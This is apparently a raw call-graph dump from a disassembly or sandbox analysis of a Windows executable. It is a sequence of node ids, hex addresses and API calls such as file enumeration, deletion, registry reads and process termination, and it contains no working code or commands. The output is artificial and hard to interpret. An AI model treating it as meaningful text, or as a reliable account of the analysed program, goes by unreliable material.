99297->99298 99299 c7d78b 99297->99299 99314 c85153 26 API calls 2 library calls 99297->99314 99313 c7f669 20 API calls __dosmaperr 99298->99313 99299->99298 99308 c7d7fd 99299->99308 99315 c85153 26 API calls 2 library calls 99299->99315 99301 c7d868 99301->99298 99303 c7d87b 99301->99303 99306 c7d774 99301->99306 99318 c85153 26 API calls 2 library calls 99303->99318 99304 c7d820 99304->99298 99305 c7d841 99304->99305 99316 c85153 26 API calls 2 library calls 99304->99316 99305->99298 99305->99306 99310 c7d857 99305->99310 99306->98763 99308->99301 99308->99304 99317 c85153 26 API calls 2 library calls 99310->99317 99313->99306 99314->99299 99315->99308 99316->99305 99317->99306 99318->99306 99319->99295 99320->99306 99322 c5bf07 8 API calls 99321->99322 99323 cbd853 99322->99323 99324 c5bf07 8 API calls 99323->99324 99325 cbd85b 99324->99325 99326 c5bf07 8 API calls 99325->99326 99327 cbd863 99326->99327 99328 c5557e 9 API calls 99327->99328 99329 cbd86d 99328->99329 99330 c5557e 9 API calls 99329->99330 99331 cbd877 99330->99331 99367 cbe958 99331->99367 99333 cbd882 99334 cbe9c5 GetFileAttributesW 99333->99334 99335 cbd88d 99334->99335 99336 cbd89f 99335->99336 99337 c565a4 8 API calls 99335->99337 99338 cbe9c5 GetFileAttributesW 99336->99338 99337->99336 99339 cbd8a7 99338->99339 99340 cbd8b4 99339->99340 99341 c565a4 8 API calls 99339->99341 99342 c5bf07 8 API calls 99340->99342 99341->99340 99343 cbd8bc 99342->99343 99344 c5bf07 8 API calls 99343->99344 99345 cbd8c4 99344->99345 99346 c5694e 8 API calls 99345->99346 99347 cbd8d5 FindFirstFileW 99346->99347 99348 cbda23 FindClose 99347->99348 99361 cbd8f8 99347->99361 99358 cbda21 99348->99358 99349 cbd9ef FindNextFileW 99349->99361 99350 c5b25f 8 API calls 99350->99361 99352 c57af4 8 API calls 99352->99361 99354 cbdc8e 4 API calls 99354->99361 99355 cbda12 FindClose 99355->99358 99356 cbd984 99357 c6e2e5 41 API calls 99356->99357 99359 cbd9ad MoveFileW 99356->99359 99362 cbd99d DeleteFileW 99356->99362 99357->99356 99358->98797 99359->99361 99360 cbda5c CopyFileExW 99360->99361 99361->99348 99361->99349 99361->99350 99361->99352 99361->99354 99361->99355 99361->99356 99361->99360 99363 cbd9ca DeleteFileW 99361->99363 99378 cbdf85 99361->99378 99432 c565a4 99361->99432 99362->99361 99363->99361 99365 cbe387 4 API calls 99364->99365 99366 cbdc95 99365->99366 99366->98810 99366->98813 99368 c5bf07 8 API calls 99367->99368 99369 cbe96d 99368->99369 99370 c5bf07 8 API calls 99369->99370 99371 cbe975 99370->99371 99372 c5694e 8 API calls 99371->99372 99373 cbe984 99372->99373 99374 c5694e 8 API calls 99373->99374 99375 cbe994 99374->99375 99376 c6e2e5 41 API calls 99375->99376 99377 cbe9a9 99376->99377 99377->99333 99379 cbdfa1 99378->99379 99380 cbdfbc 99379->99380 99381 cbdfa6 99379->99381 99382 c5bf07 8 API calls 99380->99382 99383 c5be6d 8 API calls 99381->99383 99431 cbdfb7 99381->99431 99384 cbdfc4 99382->99384 99383->99431 99385 c5bf07 8 API calls 99384->99385 99386 cbdfcc 99385->99386 99387 c5bf07 8 API calls 99386->99387 99388 cbdfd7 99387->99388 99389 c5bf07 8 API calls 99388->99389 99390 cbdfdf 99389->99390 99391 c5bf07 8 API calls 99390->99391 99392 cbdfe7 99391->99392 99393 c5bf07 8 API calls 99392->99393 99394 cbdfef 99393->99394 99395 c5bf07 8 API calls 99394->99395 99396 cbdff7 99395->99396 99397 c5bf07 8 API calls 99396->99397 99431->99361 99433 c95629 99432->99433 99434 c565bb 99432->99434 99436 c7016b 8 API calls 99433->99436 99443 c565cc 99434->99443 99438 c95633 _wcslen 99436->99438 99437 c565c6 99437->99361 99439 c7019b 8 API calls 99438->99439 99440 c9566c __fread_nolock 99439->99440 99444 c565dc _wcslen 99443->99444 99445 c9568b 99444->99445 99446 c565ef 99444->99446 99448 c7016b 8 API calls 99445->99448 99447 c57cb3 8 API calls 99446->99447 99449 c565fc __fread_nolock 99447->99449 99450 c95695 99448->99450 99449->99437 99451 c7019b 8 API calls 99450->99451 99452 c956c5 __fread_nolock 99451->99452 99454 c58e70 52 API calls 99453->99454 99455 cd88ed 99454->99455 99481 cd8932 messages 99455->99481 99491 cd9632 99455->99491 99457 cd8bde 99458 cd8dac 99457->99458 99462 cd8bec 99457->99462 99558 cd9843 59 API calls 99458->99558 99461 cd8dbb 99461->99462 99463 cd8dc7 99461->99463 99504 cd87e3 99462->99504 99463->99481 99464 c58e70 52 API calls 99480 cd89a6 99464->99480 99469 cd8c25 99518 c70000 99469->99518 99472 cd8c5f 99522 c57d51 99472->99522 99473 cd8c45 99557 cc3ef6 81 API calls __wsopen_s 99473->99557 99476 cd8c50 GetCurrentProcess TerminateProcess 99476->99472 99480->99457 99480->99464 99480->99481 99555 cb4a0c 8 API calls __fread_nolock 99480->99555 99556 cd8e7c 41 API calls _strftime 99480->99556 99481->98816 99482 c61c50 8 API calls 99484 cd8c9e 99482->99484 99483 cd8e22 99483->99481 99485 cd8e36 FreeLibrary 99483->99485 99486 cd94da 74 API calls 99484->99486 99485->99481 99490 cd8caf 99486->99490 99489 c5b3fe 8 API calls 99489->99490 99490->99483 99490->99489 99533 c61c50 99490->99533 99544 cd94da 99490->99544 99492 c5c269 8 API calls 99491->99492 99493 cd964d CharLowerBuffW 99492->99493 99559 cb96e3 99493->99559 99497 c5bf07 8 API calls 99498 cd9689 99497->99498 99499 c58685 8 API calls 99498->99499 99500 cd969d 99499->99500 99501 c596d9 8 API calls 99500->99501 99503 cd96a7 _wcslen 99501->99503 99502 cd97bd _wcslen 99502->99480 99503->99502 99566 cd8e7c 41 API calls _strftime 99503->99566 99505 cd87fe 99504->99505 99509 cd8849 99504->99509 99506 c7019b 8 API calls 99505->99506 99508 cd8820 99506->99508 99507 c7016b 8 API calls 99507->99508 99508->99507 99508->99509 99510 cd99f5 99509->99510 99511 cd9c0a messages 99510->99511 99516 cd9a19 _strcat _wcslen ___std_exception_copy 99510->99516 99511->99469 99512 c5c9fb 39 API calls 99512->99516 99513 c5c92d 39 API calls 99513->99516 99514 c5c5df 39 API calls 99514->99516 99515 c58e70 52 API calls 99515->99516 99516->99511 99516->99512 99516->99513 99516->99514 99516->99515 99567 cbf7da 10 API calls _wcslen 99516->99567 99519 c70015 99518->99519 99520 c700ad TerminateProcess 99519->99520 99521 c7007b 99519->99521 99520->99521 99521->99472 99521->99473 99523 c57d59 99522->99523 99524 c7016b 8 API calls 99523->99524 99525 c57d67 99524->99525 99568 c58386 99525->99568 99528 c583b0 99571 c5c700 99528->99571 99530 c7019b 8 API calls 99532 c5845c 99530->99532 99531 c583c0 99531->99530 99531->99532 99532->99482 99532->99490 99535 c61c62 99533->99535 99534 c61c6b 99537 c61d20 99534->99537 99538 c7016b 8 API calls 99534->99538 99535->99534 99579 c6b71c 8 API calls 99535->99579 99537->99490 99539 c61d89 99538->99539 99540 c7016b 8 API calls 99539->99540 99541 c61d92 99540->99541 99542 c5b25f 8 API calls 99541->99542 99543 c61da1 99542->99543 99543->99490 99545 cd94f2 99544->99545 99553 cd950e 99544->99553 99546 cd94f9 99545->99546 99547 cd951a 99545->99547 99548 cd95c3 99545->99548 99545->99553 99580 cbf3fd 10 API calls _strlen 99546->99580 99551 c56ab6 8 API calls 99547->99551 99595 cc15b3 72 API calls messages 99548->99595 99551->99553 99552 cd9503 99581 c56ab6 99552->99581 99553->99490 99555->99480 99556->99480 99557->99476 99558->99461 99560 cb9703 _wcslen 99559->99560 99561 cb97f2 99560->99561 99562 cb97f7 99560->99562 99563 cb9738 99560->99563 99561->99497 99561->99503 99562->99561 99565 c6e2e5 41 API calls 99562->99565 99563->99561 99564 c6e2e5 41 API calls 99563->99564 99564->99563 99565->99562 99566->99502 99567->99516 99569 c7016b 8 API calls 99568->99569 99570 c57d6f 99569->99570 99570->99528 99572 c5c70b 99571->99572 99573 ca1228 99572->99573 99578 c5c713 messages 99572->99578 99574 c7016b 8 API calls 99573->99574 99576 ca1234 99574->99576 99575 c5c71a 99575->99531 99577 c5c780 8 API calls 99577->99578 99578->99575 99578->99577 99579->99534 99580->99552 99582 c9587b 99581->99582 99583 c56ac6 99581->99583 99584 c9588c 99582->99584 99585 c584b7 8 API calls 99582->99585 99588 c7016b 8 API calls 99583->99588 99586 c5bceb 8 API calls 99584->99586 99585->99584 99587 c95896 99586->99587 99587->99587 99589 c56ad9 99588->99589 99590 c56af4 99589->99590 99591 c56ae2 99589->99591 99592 c5bf07 8 API calls 99590->99592 99593 c5b25f 8 API calls 99591->99593 99594 c56aea 99592->99594 99593->99594 99594->99553 99595->99553 99597 c5bceb 8 API calls 99596->99597 99598 cdd6bf 99597->99598 99599 c5bceb 8 API calls 99598->99599 99600 cdd6c7 99599->99600 99601 c5bceb 8 API calls 99600->99601 99602 cdd6cf 99601->99602 99603 cdd737 99602->99603 99604 c5627c 8 API calls 99602->99604 99605 c5bceb 8 API calls 99603->99605 99606 cdd6e5 99604->99606 99608 cdd735 99605->99608 99606->99603 99607 c5627c 8 API calls 99606->99607 99609 cdd6f7 99607->99609 99611 c58685 8 API calls 99608->99611 99609->99603 99610 cdd6fc 99609->99610 99612 c596d9 8 API calls 99610->99612 99613 cdd760 99611->99613 99617 cdd707 99612->99617 99614 c58685 8 API calls 99613->99614 99615 cdd777 99614->99615 99616 c579ed 8 API calls 99615->99616 99618 cdd780 99616->99618 99619 c58685 8 API calls 99617->99619 99618->98827 99620 cdd728 99619->99620 99621 c596d9 8 API calls 99620->99621 99621->99608 99623 c5c269 8 API calls 99622->99623 99624 cdd30e CharUpperBuffW 99623->99624 99625 cdd329 99624->99625 99626 c5bf07 8 API calls 99625->99626 99627 cdd334 99626->99627 99628 c58685 8 API calls 99627->99628 99629 cdd347 _wcslen 99628->99629 99630 c579ed 8 API calls 99629->99630 99631 cdd3a4 _wcslen 99629->99631 99630->99631 99631->98829 99633 c74dc6 99632->99633 99634 c74e3b 99632->99634 99641 c74deb 99633->99641 99643 c7f669 20 API calls __dosmaperr 99633->99643 99645 c74e4d 40 API calls 4 library calls 99634->99645 99636 c74e48 99636->98840 99638 c74dd2 99644 c82b7c 26 API calls __wsopen_s 99638->99644 99640 c74ddd 99640->98840 99641->98840 99643->99638 99644->99640 99645->99636 99647 c7019b 8 API calls 99646->99647 99648 c57a39 99647->99648 99649 c7016b 8 API calls 99648->99649 99650 c57a47 99649->99650 99650->98913 99652 c5bf07 8 API calls 99651->99652 99653 cb9b6d 99652->99653 99654 c57a14 8 API calls 99653->99654 99655 cb9b81 99654->99655 99656 cb96e3 41 API calls 99655->99656 99662 cb9ba3 99655->99662 99657 cb9b9d 99656->99657 99660 c58685 8 API calls 99657->99660 99657->99662 99658 cb96e3 41 API calls 99658->99662 99659 c58685 8 API calls 99659->99662 99660->99662 99661 c57af4 8 API calls 99661->99662 99662->99658 99662->99659 99662->99661 99663 cb9c42 99662->99663 99666 cb9c26 99662->99666 99664 c5be6d 8 API calls 99663->99664 99665 cb9c51 99663->99665 99664->99665 99665->98941 99667 c58685 8 API calls 99666->99667 99668 cb9c36 99667->99668 99669 c57af4 8 API calls 99668->99669 99669->99663 99671 c7016b 8 API calls 99670->99671 99672 c541b8 99671->99672 99672->98964 99674 c5bf07 8 API calls 99673->99674 99675 cbdb88 99674->99675 99676 c5bf07 8 API calls 99675->99676 99677 cbdb91 99676->99677 99678 c5bf07 8 API calls 99677->99678 99679 cbdb9a 99678->99679 99680 c5557e 9 API calls 99679->99680 99681 cbdba5 99680->99681 99682 cbe9c5 GetFileAttributesW 99681->99682 99683 cbdbae 99682->99683 99684 cbdbc0 99683->99684 99685 c565a4 8 API calls 99683->99685 99686 c5694e 8 API calls 99684->99686 99685->99684 99687 cbdbd4 FindFirstFileW 99686->99687 99688 cbdc60 FindClose 99687->99688 99694 cbdbf3 99687->99694 99693 cbdc6b 99688->99693 99689 cbdc3b FindNextFileW 99690 cbdc4f 99689->99690 99689->99694 99690->99694 99691 c5be6d 8 API calls 99691->99694 99692 c57af4 8 API calls 99692->99694 99693->98980 99694->99688 99694->99689 99694->99691 99694->99692 99695 c565a4 8 API calls 99694->99695 99696 cbdc2c DeleteFileW 99695->99696 99696->99689 99697 cbdc57 FindClose 99696->99697 99697->99693 99699 c95985 99698->99699 99700 c56e69 CreateFileW 99698->99700 99701 c56e88 99699->99701 99702 c9598b CreateFileW 99699->99702 99700->99701 99701->99018 99701->99019 99702->99701 99703 c959b3 99702->99703 99749 c56bfa 99703->99749 99707 c56b27 99706->99707 99720 c56b24 messages 99706->99720 99708 c56bfa 3 API calls 99707->99708 99707->99720 99709 c56b44 99708->99709 99710 c9589b 99709->99710 99711 c56b51 99709->99711 99712 c6fdc9 3 API calls 99710->99712 99713 c7019b 8 API calls 99711->99713 99712->99720 99714 c56b5d 99713->99714 99715 c541a6 8 API calls 99714->99715 99716 c56b67 99715->99716 99755 c5b050 99716->99755 99719 c56bfa 3 API calls 99719->99720 99720->99028 99722 c56bfa 3 API calls 99721->99722 99723 c6fde7 99722->99723 99724 c56bfa 3 API calls 99723->99724 99725 c6fe08 99724->99725 99725->99008 99727 c6bfc7 99726->99727 99728 c6c003 99726->99728 99727->99728 99732 c6bfd6 99727->99732 99729 c5bceb 8 API calls 99728->99729 99738 cbd2ab 99729->99738 99730 c6bfeb 99762 c6c009 99730->99762 99731 cbd2da 99731->99022 99732->99730 99733 c6bff8 99732->99733 99769 cbd3b2 12 API calls 99733->99769 99736 c6bff4 99736->99022 99738->99731 99770 cbd249 99738->99770 99777 c5acc0 8 API calls __fread_nolock 99738->99777 99740->99033 99741->99034 99742->99038 99743->98990 99744->98990 99746 c5b050 2 API calls 99745->99746 99747 c541da 99746->99747 99747->99021 99748->99030 99754 c56c11 99749->99754 99750 c958ec SetFilePointerEx 99751 c56c98 SetFilePointerEx SetFilePointerEx 99753 c56c64 99751->99753 99752 c958db 99752->99750 99753->99701 99754->99750 99754->99751 99754->99752 99754->99753 99756 c5b0cb 99755->99756 99758 c5b05e 99755->99758 99761 c6f13c SetFilePointerEx 99756->99761 99759 c56b73 99758->99759 99760 c5b09c ReadFile 99758->99760 99759->99719 99760->99758 99760->99759 99761->99758 99763 c6c1f1 8 API calls 99762->99763 99764 c6c021 99763->99764 99778 c5adc1 99764->99778 99768 c6c03c 99768->99736 99769->99736 99771 cbd26a 99770->99771 99772 cbd253 99770->99772 99774 c5b050 2 API calls 99771->99774 99772->99771 99773 cbd259 99772->99773 99775 c5b050 2 API calls 99773->99775 99776 cbd263 99774->99776 99775->99776 99776->99738 99777->99738 99792 c6feaa 99778->99792 99780 c5add2 99781 c5b050 2 API calls 99780->99781 99782 c5ae07 99780->99782 99799 c5b0e3 8 API calls __fread_nolock 99780->99799 99781->99780 99782->99768 99784 c58774 MultiByteToWideChar 99782->99784 99785 c587e7 99784->99785 99786 c587a0 99784->99786 99788 c5bceb 8 API calls 99785->99788 99787 c7019b 8 API calls 99786->99787 99789 c587b5 MultiByteToWideChar 99787->99789 99790 c587db 99788->99790 99800 c587f0 99789->99800 99790->99768 99793 cafe13 99792->99793 99794 c6febb 99792->99794 99795 c7016b 8 API calls 99793->99795 99794->99780 99796 cafe1d 99795->99796 99797 c7019b 8 API calls 99796->99797 99798 cafe32 99797->99798 99799->99780 99801 c58884 99800->99801 99802 c58803 99800->99802 99803 c596d9 8 API calls 99801->99803 99802->99801 99804 c5880f 99802->99804 99809 c58821 __fread_nolock 99803->99809 99805 c58847 99804->99805 99806 c58819 99804->99806 99808 c7016b 8 API calls 99805->99808 99812 c58894 8 API calls 99806->99812 99810 c58851 99808->99810 99809->99790 99811 c7019b 8 API calls 99810->99811 99811->99809 99812->99809 99813 c615af 99820 c6e34f 99813->99820 99815 c615c5 99829 c6e3b3 99815->99829 99817 c615ef 99819 ca61ab 99817->99819 99841 cc3ef6 81 API calls __wsopen_s 99817->99841 99821 c6e370 99820->99821 99822 c6e35d 99820->99822 99824 c6e375 99821->99824 99825 c6e3a3 99821->99825 99823 c5b3fe 8 API calls 99822->99823 99828 c6e367 99823->99828 99826 c7016b 8 API calls 99824->99826 99827 c5b3fe 8 API calls 99825->99827 99826->99828 99827->99828 99828->99815 99830 c57a14 8 API calls 99829->99830 99831 c6e3ea 99830->99831 99832 c5b25f 8 API calls 99831->99832 99834 c6e41b 99831->99834 99833 cae4e4 99832->99833 99835 c57af4 8 API calls 99833->99835 99834->99817 99836 cae4ef 99835->99836 99842 c6e73b 39 API calls 99836->99842 99838 cae502 99839 c5b3fe 8 API calls 99838->99839 99840 cae506 99838->99840 99839->99840 99840->99840 99841->99819 99842->99838 99843 c927a2 99846 c52a52 99843->99846 99847 c52a91 mciSendStringW 99846->99847 99848 c939f4 DestroyWindow 99846->99848 99849 c52aad 99847->99849 99850 c52d08 99847->99850 99859 c93a00 99848->99859 99851 c52abb 99849->99851 99849->99859 99850->99849 99852 c52d17 UnregisterHotKey 99850->99852 99878 c52e70 99851->99878 99852->99850 99855 c93a45 99860 c93a69 99855->99860 99861 c93a58 FreeLibrary 99855->99861 99856 c93a1e FindClose 99856->99859 99857 c57953 CloseHandle 99857->99859 99858 c52ad0 99858->99860 99867 c52ade 99858->99867 99859->99855 99859->99856 99859->99857 99862 c93a7d VirtualFree 99860->99862 99869 c52b4b 99860->99869 99861->99855 99862->99860 99863 c52b3a CoUninitialize 99863->99869 99864 c52b56 99866 c52b66 99864->99866 99865 c93ac5 99871 c93ad4 messages 99865->99871 99884 cc3c45 6 API calls messages 99865->99884 99882 c52f86 VirtualFreeEx CloseHandle 99866->99882 99867->99863 99869->99864 99869->99865 99875 c93b63 99871->99875 99885 cb6d63 8 API calls messages 99871->99885 99873 c52b7c 99873->99871 99874 c52c61 99873->99874 99874->99875 99883 c52eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 99874->99883 99875->99875 99877 c52d03 99879 c52e7d 99878->99879 99880 c52ac2 99879->99880 99886 cb78b9 8 API calls 99879->99886 99880->99855 99880->99858 99882->99873 99883->99877 99884->99865 99885->99871 99886->99879 99887 c7078b 99888 c70797 __FrameHandler3::FrameUnwindToState 99887->99888 99917 c70241 99888->99917 99890 c7079e 99891 c708f1 99890->99891 99894 c707c8 99890->99894 99958 c70bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99891->99958 99893 c708f8 99951 c751e2 99893->99951 99904 c70807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99894->99904 99928 c8280d 99894->99928 99901 c707e7 99903 c70868 99936 c70ce9 99903->99936 99904->99903 99954 c751aa 38 API calls 3 library calls 99904->99954 99906 c7086e 99940 c532a2 99906->99940 99911 c7088a 99911->99893 99912 c7088e 99911->99912 99913 c70897 99912->99913 99956 c75185 28 API calls _abort 99912->99956 99957 c703d0 13 API calls 2 library calls 99913->99957 99916 c7089f 99916->99901 99918 c7024a 99917->99918 99960 c70a28 IsProcessorFeaturePresent 99918->99960 99920 c70256 99961 c73024 10 API calls 3 library calls 99920->99961 99922 c7025b 99927 c7025f 99922->99927 99962 c826a7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99922->99962 99924 c70268 99925 c70276 99924->99925 99963 c7304d 8 API calls 3 library calls 99924->99963 99925->99890 99927->99890 99931 c82824 99928->99931 99930 c707e1 99930->99901 99932 c827b1 99930->99932 99964 c70e1c 99931->99964 99933 c827e0 99932->99933 99934 c70e1c CatchGuardHandler 5 API calls 99933->99934 99935 c82809 99934->99935 99935->99904 99972 c726d0 99936->99972 99939 c70d0f 99939->99906 99941 c53309 99940->99941 99942 c532ae IsThemeActive 99940->99942 99955 c70d22 GetModuleHandleW 99941->99955 99974 c752d3 99942->99974 99944 c532d9 99980 c75339 99944->99980 99946 c532e0 99987 c5326d SystemParametersInfoW SystemParametersInfoW 99946->99987 99948 c532e7 99988 c53312 99948->99988 100873 c74f5f 99951->100873 99954->99903 99955->99911 99956->99913 99957->99916 99958->99893 99960->99920 99961->99922 99962->99924 99963->99927 99965 c70e27 IsProcessorFeaturePresent 99964->99965 99966 c70e25 99964->99966 99968 c70fee 99965->99968 99966->99930 99971 c70fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99968->99971 99970 c710d1 99970->99930 99971->99970 99973 c70cfc GetStartupInfoW 99972->99973 99973->99939 99975 c752df __FrameHandler3::FrameUnwindToState 99974->99975 100037 c832ee EnterCriticalSection 99975->100037 99977 c752ea pre_c_initialization 100038 c7532a 99977->100038 99979 c7531f __wsopen_s 99979->99944 99981 c75345 99980->99981 99982 c7535f 99980->99982 99981->99982 100042 c7f669 20 API calls __dosmaperr 99981->100042 99982->99946 99984 c7534f 100043 c82b7c 26 API calls __wsopen_s 99984->100043 99986 c7535a 99986->99946 99987->99948 99989 c53322 __wsopen_s 99988->99989 99990 c5bf07 8 API calls 99989->99990 99991 c5332e GetCurrentDirectoryW 99990->99991 100044 c54f60 99991->100044 100037->99977 100041 c83336 LeaveCriticalSection 100038->100041 100040 c75331 100040->99979 100041->100040 100042->99984 100043->99986 100045 c5bf07 8 API calls 100044->100045 100046 c54f76 100045->100046 100166 c560f5 100046->100166 100048 c54f94 100049 c5bceb 8 API calls 100048->100049 100050 c54fa8 100049->100050 100051 c5be6d 8 API calls 100050->100051 100052 c54fb3 100051->100052 100180 c588e8 100052->100180 100055 c5b25f 8 API calls 100056 c54fcc 100055->100056 100057 c5bdc1 39 API calls 100056->100057 100058 c54fdc 100057->100058 100059 c5b25f 8 API calls 100058->100059 100060 c55002 100059->100060 100061 c5bdc1 39 API calls 100060->100061 100062 c55011 100061->100062 100063 c5bf07 8 API calls 100062->100063 100064 c5502f 100063->100064 100183 c55151 100064->100183 100067 c74db8 _strftime 40 API calls 100068 c55049 100067->100068 100069 c94afd 100068->100069 100070 c55053 100068->100070 100071 c55151 8 API calls 100069->100071 100072 c74db8 _strftime 40 API calls 100070->100072 100073 c94b11 100071->100073 100074 c5505e 100072->100074 100076 c55151 8 API calls 100073->100076 100074->100073 100075 c55068 100074->100075 100077 c74db8 _strftime 40 API calls 100075->100077 100078 c94b2d 100076->100078 100079 c55073 100077->100079 100081 c5551b 10 API calls 100078->100081 100079->100078 100080 c5507d 100079->100080 100083 c94b50 100081->100083 100167 c56102 __wsopen_s 100166->100167 100168 c584b7 8 API calls 100167->100168 100169 c56134 100167->100169 100168->100169 100170 c5627c 8 API calls 100169->100170 100177 c5616a 100169->100177 100170->100169 100171 c5b25f 8 API calls 100172 c56261 100171->100172 100174 c5684e 8 API calls 100172->100174 100173 c5b25f 8 API calls 100173->100177 100175 c5626d 100174->100175 100175->100048 100177->100173 100178 c56238 100177->100178 100179 c5627c 8 API calls 100177->100179 100200 c5684e 100177->100200 100178->100171 100178->100175 100179->100177 100181 c7016b 8 API calls 100180->100181 100182 c54fbf 100181->100182 100182->100055 100184 c55179 100183->100184 100185 c5515b 100183->100185 100186 c584b7 8 API calls 100184->100186 100187 c5be6d 8 API calls 100185->100187 100188 c5503b 100185->100188 100186->100188 100187->100188 100188->100067 100201 c5685d 100200->100201 100205 c5687e __fread_nolock 100200->100205 100203 c7019b 8 API calls 100201->100203 100202 c7016b 8 API calls 100204 c56891 100202->100204 100203->100205 100204->100177 100205->100202 100874 c74f6b pair 100873->100874 100875 c74f84 100874->100875 100876 c74f72 100874->100876 100897 c832ee EnterCriticalSection 100875->100897 100912 c750b9 GetModuleHandleW 100876->100912 100879 c74f77 100879->100875 100913 c750fd GetModuleHandleExW 100879->100913 100880 c75029 100901 c75069 100880->100901 100884 c75000 100888 c75018 100884->100888 100893 c827b1 _abort 5 API calls 100884->100893 100886 c75046 100904 c75078 100886->100904 100887 c75072 100921 c920c9 5 API calls CatchGuardHandler 100887->100921 100894 c827b1 _abort 5 API calls 100888->100894 100889 c74f8b 100889->100880 100889->100884 100898 c82538 100889->100898 100893->100888 100894->100880 100897->100889 100922 c82271 100898->100922 100941 c83336 LeaveCriticalSection 100901->100941 100903 c75042 100903->100886 100903->100887 100942 c8399c 100904->100942 100907 c750a6 100910 c750fd _abort 8 API calls 100907->100910 100908 c75086 GetPEB 100908->100907 100909 c75096 GetCurrentProcess TerminateProcess 100908->100909 100909->100907 100911 c750ae ExitProcess 100910->100911 100912->100879 100914 c75127 GetProcAddress 100913->100914 100915 c7514a 100913->100915 100920 c7513c 100914->100920 100916 c75150 FreeLibrary 100915->100916 100917 c75159 100915->100917 100916->100917 100918 c70e1c CatchGuardHandler 5 API calls 100917->100918 100919 c74f83 100918->100919 100919->100875 100920->100915 100925 c82220 100922->100925 100924 c82295 100924->100884 100926 c8222c __FrameHandler3::FrameUnwindToState 100925->100926 100933 c832ee EnterCriticalSection 100926->100933 100928 c8223a 100934 c822c1 100928->100934 100932 c82258 __wsopen_s 100932->100924 100933->100928 100935 c822e9 100934->100935 100936 c822e1 100934->100936 100935->100936 100939 c82d58 _free 20 API calls 100935->100939 100937 c70e1c CatchGuardHandler 5 API calls 100936->100937 100938 c82247 100937->100938 100940 c82265 LeaveCriticalSection _abort 100938->100940 100939->100936 100940->100932 100941->100903 100943 c839c1 100942->100943 100944 c839b7 100942->100944 100949 c83367 5 API calls 2 library calls 100943->100949 100946 c70e1c CatchGuardHandler 5 API calls 100944->100946 100947 c75082 100946->100947 100947->100907 100947->100908 100948 c839d8 100948->100944 100949->100948 100950 cae5f8 GetUserNameW 100951 cae610 100950->100951 100952 c5f470 100955 c69fa5 100952->100955 100954 c5f47c 100956 c69fc6 100955->100956 100962 c6a023 100955->100962 100958 c602f0 253 API calls 100956->100958 100956->100962 100961 c69ff7 100958->100961 100959 ca800f 100959->100959 100960 c6a067 100960->100954 100961->100960 100961->100962 100963 c5be6d 8 API calls 100961->100963 100962->100960 100964 cc3ef6 81 API calls __wsopen_s 100962->100964 100963->100962 100964->100959 100965 c794d1 100975 c7e048 100965->100975 100969 c794de 100970 c8510a 20 API calls 100969->100970 100971 c794ed DeleteCriticalSection 100970->100971 100971->100969 100972 c79508 100971->100972 100973 c82d58 _free 20 API calls 100972->100973 100974 c79513 100973->100974 100988 c7e051 100975->100988 100977 c794d9 100978 c8506a 100977->100978 100979 c85076 __FrameHandler3::FrameUnwindToState 100978->100979 101005 c832ee EnterCriticalSection 100979->101005 100981 c850ec 101006 c85101 100981->101006 100983 c85081 100983->100981 100985 c850c0 DeleteCriticalSection 100983->100985 100987 c7ea08 67 API calls 100983->100987 100984 c850f8 __wsopen_s 100984->100969 100986 c82d58 _free 20 API calls 100985->100986 100986->100983 100987->100983 100989 c7e05d __FrameHandler3::FrameUnwindToState 100988->100989 100998 c832ee EnterCriticalSection 100989->100998 100991 c7e100 100999 c7e120 100991->100999 100994 c7e06c 100994->100991 100997 c7e001 66 API calls 100994->100997 101002 c7951d EnterCriticalSection 100994->101002 101003 c7e0f6 LeaveCriticalSection __fread_nolock 100994->101003 100995 c7e10c __wsopen_s 100995->100977 100997->100994 100998->100994 101004 c83336 LeaveCriticalSection 100999->101004 101001 c7e127 101001->100995 101002->100994 101003->100994 101004->101001 101005->100983 101009 c83336 LeaveCriticalSection 101006->101009 101008 c85108 101008->100984 101009->101008 101010 c51033 101015 c56686 101010->101015 101014 c51042 101016 c5bf07 8 API calls 101015->101016 101017 c566f4 101016->101017 101023 c555cc 101017->101023 101020 c56791 101021 c51038 101020->101021 101026 c568e6 8 API calls __fread_nolock 101020->101026 101022 c70433 29 API calls __onexit 101021->101022 101022->101014 101027 c555f8 101023->101027 101026->101020 101028 c55605 101027->101028 101029 c555eb 101027->101029 101028->101029 101030 c5560c RegOpenKeyExW 101028->101030 101029->101020 101030->101029 101031 c55626 RegQueryValueExW 101030->101031 101032 c55647 101031->101032 101033 c5565c RegCloseKey 101031->101033 101032->101033 101033->101029 101034 cae6dd 101036 cae68a 101034->101036 101037 cbe753 SHGetFolderPathW 101036->101037 101038 c584b7 8 API calls 101037->101038 101039 cbe780 101038->101039 101039->101036 101040 c5367c 101043 c53696 101040->101043 101044 c536ad 101043->101044 101045 c53711 101044->101045 101046 c536b2 101044->101046 101082 c5370f 101044->101082 101050 c53717 101045->101050 101051 c93dce 101045->101051 101047 c536bf 101046->101047 101048 c5378b PostQuitMessage 101046->101048 101052 c93e3b 101047->101052 101053 c536ca 101047->101053 101074 c53690 101048->101074 101049 c536f6 DefWindowProcW 101049->101074 101055 c53743 SetTimer RegisterWindowMessageW 101050->101055 101056 c5371e 101050->101056 101099 c52f24 10 API calls 101051->101099 101104 cbc80c 65 API calls ___scrt_fastfail 101052->101104 101057 c53795 101053->101057 101058 c536d4 101053->101058 101059 c5376c CreatePopupMenu 101055->101059 101055->101074 101062 c53727 KillTimer 101056->101062 101063 c93d6f 101056->101063 101088 c6fcbb 101057->101088 101064 c93e20 101058->101064 101065 c536df 101058->101065 101059->101074 101061 c93def 101100 c6f1c6 40 API calls 101061->101100 101095 c5388e Shell_NotifyIconW ___scrt_fastfail 101062->101095 101069 c93daa MoveWindow 101063->101069 101070 c93d74 101063->101070 101064->101049 101103 cb1367 8 API calls 101064->101103 101072 c53779 101065->101072 101073 c536ea 101065->101073 101066 c93e4d 101066->101049 101066->101074 101069->101074 101075 c93d99 SetFocus 101070->101075 101076 c93d7a 101070->101076 101097 c537a6 75 API calls ___scrt_fastfail 101072->101097 101073->101049 101101 c5388e Shell_NotifyIconW ___scrt_fastfail 101073->101101 101075->101074 101076->101073 101080 c93d83 101076->101080 101077 c5373a 101096 c5572c DeleteObject DestroyWindow 101077->101096 101098 c52f24 10 API calls 101080->101098 